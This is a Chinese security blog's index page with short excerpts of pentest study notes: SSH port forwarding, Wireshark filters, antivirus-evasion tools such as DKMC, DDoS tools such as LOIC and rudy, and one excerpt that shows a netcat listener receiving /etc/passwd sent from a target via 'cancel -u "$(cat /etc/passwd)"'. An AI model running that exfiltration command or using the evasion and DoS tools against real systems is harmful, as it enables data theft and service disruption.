micr067 - 博客园

2019年3月23日

摘要： 1.安装CA证书生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书选择高级证书申请将之前生成的base64证书文件内容贴进来 ok，完成挂起的申请—所有任务—颁发在颁发的证书中可以看到我们已经申请好的证书。访问http://127.0.0.1/certsrv 阅读全文

posted @ 2019-03-23 22:40 micr067 阅读(236) 评论(0) 推荐(0) 编辑

ssh 端口转发

摘要： ssh本地端口转发 (1)SSH 支持双向通信隧道将其他 TCP 端口的通信通过 SSH 链接来转发用 SSH 作为传输协议，对流量自动加解密突破防火墙访问规则的限制，可用于FQ (2)SSH 本地端口转发使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道阅读全文

posted @ 2019-03-23 22:34 micr067 阅读(186) 评论(0) 推荐(0) 编辑

2019年3月15日

WIRESHARK图像化与命令行模式

摘要： 1.筛选器 ip.addr==192.168.88.160 and tcp.port==80 !tcp 查看分tcp的协议 frame.len<=150 查看长度小于等于150字节的数据包捕获tcp中带有psh和ack标志偏移位为13的的数据包 tcp[13]==0x18 将常用筛选条件到添加删选阅读全文

posted @ 2019-03-15 18:32 micr067 阅读(268) 评论(0) 推荐(0) 编辑

免杀工具汇总

摘要：今天整理以前的笔记，把这部分工具整理了一下，虽然没有白利用稳，但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址： https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹存放 shellcode 启动 python dkmc.py 阅读全文

posted @ 2019-03-15 18:10 micr067 阅读(1258) 评论(0) 推荐(0) 编辑

2019年3月14日

LINUX下无回显可将回显发送到服务器

摘要： nc -lvvp 7080 开启侦听 cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令攻击机成功接收到靶机发送信息。阅读全文

posted @ 2019-03-14 20:08 micr067 阅读(169) 评论(0) 推荐(0) 编辑

SSH 端口转发

摘要： ssh本地端口转发 (1)SSH 支持双向通信隧道将其他 TCP 端口的通信通过 SSH 链接来转发用 SSH 作为传输协议，对流量自动加解密突破防火墙访问规则的限制，可用于FQ (2)SSH 本地端口转发使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道阅读全文

posted @ 2019-03-14 18:06 micr067 阅读(164) 评论(0) 推荐(0) 编辑

CA证书安装以及SSLH协议转发

摘要： 1.安装CA证书生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书选择高级证书申请将之前生成的base64证书文件内容贴进来 ok，完成挂起的申请—所有任务—颁发在颁发的证书中可以看到我们已经申请好的证书。访问http://127.0.0.1/certsrv 阅读全文

posted @ 2019-03-14 08:03 micr067 阅读(197) 评论(0) 推荐(0) 编辑

（十）拒绝服务攻击工具包

摘要： 1. 简介匿名者发布的 DoS 工具LOICHOICDDoSer招募志愿者发放以上工具以上 DoS 工具不隐藏真实 IP 地址免费DDOS攻击测试工具大合集 FreeBuf 下载链接2. LOIChttps:... 阅读全文

posted @ 2019-03-14 07:26 micr067 阅读(810) 评论(0) 推荐(0) 编辑

（九）拒绝服务攻击工具

摘要：拒绝服务分类攻击带宽攻击并发消耗cpu内存攻击代码漏洞1. rudy（r-y dead yet）1. 简介慢速应用层HTTP POST攻击，与slowhttptest原理相同每次只传输一个字节的数据美剧黑客军... 阅读全文

posted @ 2019-03-14 07:24 micr067 阅读(387) 评论(0) 推荐(0) 编辑

（八）拒绝服务–应用层DoS 攻击

摘要： 1. 简介应用服务漏洞服务代码存在漏洞，遇异常提交数据时程序崩溃应用处理大量并发请求能力有限，被拒绝的是应用或OS缓冲区溢出漏洞向目标函数随机提交数据，特定情况下数据覆盖临近寄存器或内存影响: 远程代码执行、... 阅读全文

posted @ 2019-03-14 07:21 micr067 阅读(433) 评论(0) 推荐(0) 编辑

Micr067's blog

所有过往，皆为序章！

公告